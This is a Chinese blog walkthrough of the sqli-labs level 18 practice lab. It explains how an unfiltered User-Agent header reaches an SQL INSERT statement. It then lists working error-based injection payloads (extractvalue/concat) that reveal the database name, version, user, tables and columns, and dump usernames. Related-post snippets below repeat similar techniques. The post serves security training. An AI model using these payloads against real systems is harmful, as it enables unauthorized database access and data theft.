sqli-labs--------第18关

已于 2022-11-14 11:58:32 修改
阅读量1.2k 收藏 5
点赞数
分类专栏: sqli-labs 文章标签: 数据库 sql java
于 2022-11-10 17:31:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wyzhxhn/article/details/127792102
版权

SQL注入 报错注入 User-Agent 安全漏洞 信息泄露
关键词由CSDN通过智能技术生成

查看源码

 与第17关相同,详情查看sqli-labs-----第17关_Blchain的博客-CSDN博客

发现uname与passwd参数都被check_input了,不能进行sql注入

发现有两个变量uagent和IP

 第一个sql语句,但是uname与passwd参数都被check_input了

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";

又发现一个sql语句

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

可以在这个语句上做文章

  

注意:必须输入正确的username和password才能执行第二个sql语句。

可以看到登陆进去后还会再执行一条SQL语句并且包涵的$uagent没有被过滤掉,并且有报错反馈,可以采用报错注入

注入过程

前提:拿到正确的用户名和密码

通过burp suite抓包

在User-Agent参数后加入单引号',可以发现有报错信息

 要考虑value的闭合问题,假如我们利用的点是$uagent,那构建格式就应该是1',1,1)#

爆库名

User-Agent: ',extractvalue(1,concat(0x23,database(),0x23,version(),0x23,user())),1)#

 爆表名

User-Agent:',extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security'))),1)#

 爆列名

User-Agent:',extractvalue(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))),1)#

 爆username数据

',extractvalue(1,concat(0x23,mid((select group_concat(username) from security.users),1,32))),1)#

',extractvalue(1,concat(0x23,mid((select group_concat(username) from security.users),32,32))),1)#

',extractvalue(1,concat(0x23,mid((select group_concat(username) from security.users),64,32))),1)#

 完成!!!!!!

Blchain
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【渗透测试】sqli-labs闯(18-24)
qq_43168364的博客
08-22 885
第十八:user-agent单引号字符型注入点 方法:在user-agent上进行xpath报错注入 这一我们输入用户名和密码之后给我们回显除了user-agent的信息,我们猜想注入应当是发生在user-agent上的。我们首先看看源代码。 果然这里把user-agent插入了数据库,我们只需要闭合$uagent前后的单引号然后写上注入语句即可。我们首先得到表名,语法:' and ext......
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
SQLi LABS Less-18 报错注入
wangyuxiang946的博客
06-22 1万+
第十八请求方式为 GET请求 , 注入点为User-Agent , 注入方式为 错误注入 第一步,判断注入方式 先看源码 后台代码对 特殊字符进行了过滤 , 常规的注入方式行不通 , 只有通过代码审计来判断注入方式 登录成功后 , 有一个保存用户主机信息的SQL语句 , 并且没有对参数进行过滤 , 我们可以针对这个SQL进行错误注入 真实场景中 , 我们可以先注册一个账号进行登录 , 登录成功后通过User-Agent 进行错误注入 , 从而实现脱库 使用 Burp...
Sqlilabs-18
KAKA的博客
07-09 877
来到了 18 18 同样也是在 UPDATE 上面做手脚,但是限制更加严格,不仅对 username 对 password 也做了 check_input 再看看后台 SQL 语句的构造: insert="INSERTINTO‘security‘.‘uagents‘(‘uagent‘,‘ipaddress‘,‘username‘)VALUES(′insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`)
SQLI-labs-第十八
最新发布
weixin_54055099的博客
05-17 495
Sqli-labs18,http头部注入,报错注入
sqli-labs18(基于http头部报错盲注)通思路
zyh1588的博客
11-18 1884
小白回顾sql靶场第18
sqli-labs第十八详解
金 帛的博客
05-03 4780
SQL注入靶场第十八详解
sqli.labs靶场(第18~22
喜欢创作各种技术类文章,希望可以帮到你
01-28 1855
sqli.labs靶场第18到22详情
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
详细sqli-labs(1-65)通讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-lab第17~22随笔记
m0_52361291的博客
06-12 427
本来今天是说要到第25的但是到了第23我太菜了实在没看出来要咋做,用sqlmap跑了一下是利用延时注入的payload,我一开始想的是跟前面一样用的是联合注入,看了一下源代码也没看出来啥原因导致用的延时所以先休息总结一下前面的,23明天搞。在1~4sqlmap直接注入就行了 而在5~8中由于是布尔型注入所以在使用sqlmap注入时要加上 --technique B参数面对其他类型的盲注对应的参数是 在第9~10中是延时注入所以用到了 --technique T参数 11~16都是po
sql-lab 11~20总结(后续持续更新)内含18火狐无法抓到本地包的解决方法
m0_62879498的博客
12-17 2743
十一题的传参方式变成了post传参 但注入方式差不多 判断注入点 ​ 'or 1=1 – q 判断字段数 ’or 1=1 order by 2 – q 判断回显点 ​ ’ union select 1,2-- q 查询相内容 判断库名 ’ union select 1,database()-- q 判断表名 ’ union select 1,table_name from information_schema.tables where table_
sqli-labs-less-18 http头user agent+报错注入
yzcn
11-14 292
Less-18 首先利用burp suite抓包分析: Username和password验证正确时,返回ip地址和user agent信息 验证错误时,只返回ip地址 所以该卡是user agent的hppt头注入, 我们可以构造playload更改数据包 更改user agent: UA作为数据包中的信息,最后又返回出来,说明后台可能使用了insert into函数将UA插入到数据库,然后再进行输出, Insert into table value(v01,v02,) 首先判断UA是否存在注入
Sqli-lab教程-史上最全详解(1-22通
qq_52364123的博客
04-10 8928
sql注入集合
sqli-labs-master第18、19
m_ing
05-15 1395
18: http://192.168.89.134/sqli-labs-master/Less-18/ 看到页面提示,和卡提示POST - Header Injection - Uagent field - Error based 后置报头注入-Uagent字段-基于错误和我的ip地址:192.169.89.1. 我们一时没有头绪,那就直接看源代码 又看到 insert语句,他把user-agent插入到了数据库,所以可以从这里下手,而且看的出来是单引号型,接下来开始爆破。 需要使用抓包工具,更改
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值